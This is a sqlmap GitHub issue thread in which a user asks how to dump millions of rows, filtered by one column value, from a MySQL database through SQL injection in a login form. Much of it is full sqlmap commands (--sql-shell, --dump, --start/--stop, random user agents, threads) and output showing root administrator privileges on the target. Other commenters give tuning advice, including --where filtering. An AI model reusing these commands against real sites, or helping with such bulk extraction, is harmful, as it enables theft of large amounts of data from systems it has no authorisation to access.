### ISSUE TITLE
Dump specific rows

### ISSUE THREAD

**Issue by ColliderTD** [sqlmapproject/sqlmap#1553]
Hi, i try this:

sqlmap -u "http://vulnweb/index.php" --data "Usuario=1&Contrasena=1&Page=Usuario&Action=Validar=&btnIngresar=Ingresar" -p "Usuario" --sql-shell

In this step i use Query:

SELECT * FROM Table WHERE Column = '201508'

From a table of more than 160 millions rows, the result of the query is approximately 4 millions rows.
How can I do? so this result is exported to Sqlite or TXT.

It's posible?

In addition I am also trying:

sqlmap -u "http://vulnweb/index.php" --data "Usuario=1&Contrasena=1&Page=Usuario&Action=Validar=&btnIngresar=Ingresar" -p "Usuario" -D "DataBase" -T "Table"  --user-agent=random --threads=10 --dump-format=SQLITE --dump

From a table of more than 16 millions rows, but  i can't:

 "connection timed out to the target url or proxy. sqlmap is going to retry the request"

I try to dump in parts, with:

sqlmap -u "http://vulnweb/index.php" --data "Usuario=1&Contrasena=1&Page=Usuario&Action=Validar=&btnIngresar=Ingresar" -p "Usuario" -D "DataBase" -T "Table" --start=1  --stop=1000 --user-agent=random --threads=10 --dump-format=SQLITE --dump

With the same error.

Am i doing something wrong?

Thanks and sorry for bad english, am from southamerica.

**Comment by stamparm** [comment]
Which DBMS and which technique?

**Comment by ColliderTD** [comment]
**Mysql**, I have not specified the technique, so this by default, but detect: **B E T**

Thanks..

**Comment by stamparm** [comment]
This should work without any problems, with whichever technique. If you run
the latest revision please checkout some older and retry.

But, I would say that maybe you don<3 't have enough permissions. Also,
please prefer --dump instead of --sql-query.

You can also try to force the technique to e.g. --technique=B

Also, try to skip --threads

**Comment by atsuyim** [comment]
sqlmap -u "http://vulnweb/index.php" --dbms=mysql --answer="crack=n" "Usuario=1&Contrasena=1&Page=Usuario&Action=Validar=&btnIngresar=Ingresar" -p "Usuario" -D "DataBase" -T --dump --no-cast --random-agent


The above line should do.....and voila

**Comment by ColliderTD** [comment]
Well, I updated **sqlmap** (just in case) I tried the yuda **atsuyim** but still follows the error "connection timed out to the target URL or proxy. Sqlmap is go ........."

**My Privileges**

[15:29:41] [INFO] testing MySQL
[15:29:41] [INFO] confirming MySQL
[15:29:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.22, PHP 5.4.4
back-end DBMS: MySQL >= 5.0.0
[15:29:41] [INFO] fetching database users privileges
[15:29:41] [INFO] the SQL query used returns 28 entries
database management system users privileges:
[*] 'root'@'%' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE

As I (with my limited experience), this should be able to do so.

Also in the example of **atsuyim** I did not understand well: the answers *crack=N*

Estimated **stamparm** how can i dump a Query result?

As I have understood, with --dump I can get: Full Table, specify number of rows....... but specific rows with a common parameter? (as my first example of query)

Thanks for your help and sorry again if dont understand me.

**Comment by stamparm** [comment]
yuda* atsuyim*???

At the end, I really don't know which version do you run

I am afraid that you don't use --dump ever which is the most basic switch
and most common one

You can --where to specify a constraint (e.g. --where "ID=1000") or
standard --start/--stop

I really don't know how you used sqlmap till now if you don't know the
--dump switch. I am amazed
On Nov 21, 2015 9:47 PM, "ColliderTD" <notifications@github.com> wrote:

Well, I updated *sqlmap* (just in case) I tried the yuda *atsuyim* but
still follows the error "connection timed out to the target URL or proxy.
Sqlmap is go ........."

*My Privileges*

[15:29:41] [INFO] testing MySQL
[15:29:41] [INFO] confirming MySQL
[15:29:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.22, PHP 5.4.4
back-end DBMS: MySQL >= 5.0.0
[15:29:41] [INFO] fetching database users privileges
[15:29:41] [INFO] the SQL query used returns 28 entries
database management system users privileges:
[*] 'root'@'%' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE

As I (with my limited experience), this should be able to do so.

Also in the example of *atsuyim* I did not understand well: the answers
*crack=N*

Estimated *stamparm* how can i dump a Query result?

As I have understood, with --dump I can get: Full Table, specify number of
rows....... but specific rows with a common parameter? (as my first example
of query)

Thanks for your help and sorry again if dont understand me.

—
Reply to this email directly or view it on GitHub
<https://github.com/sqlmapproject/sqlmap/issues/1553#issuecomment-158679868>
.

**Comment by ColliderTD** [comment]
Sorry, I wrote a word in Spanish. I had already edited to others, and was referring to the user "atsuyim" I mention above.

Version:
1.0-dev-nongit-20151121

As you see, it was installed yesterday.

**Comment by stamparm** [comment]
Have you tried everything I've proposed?

**Comment by ColliderTD** [comment]
Yeah, I do not know why this error occurs.
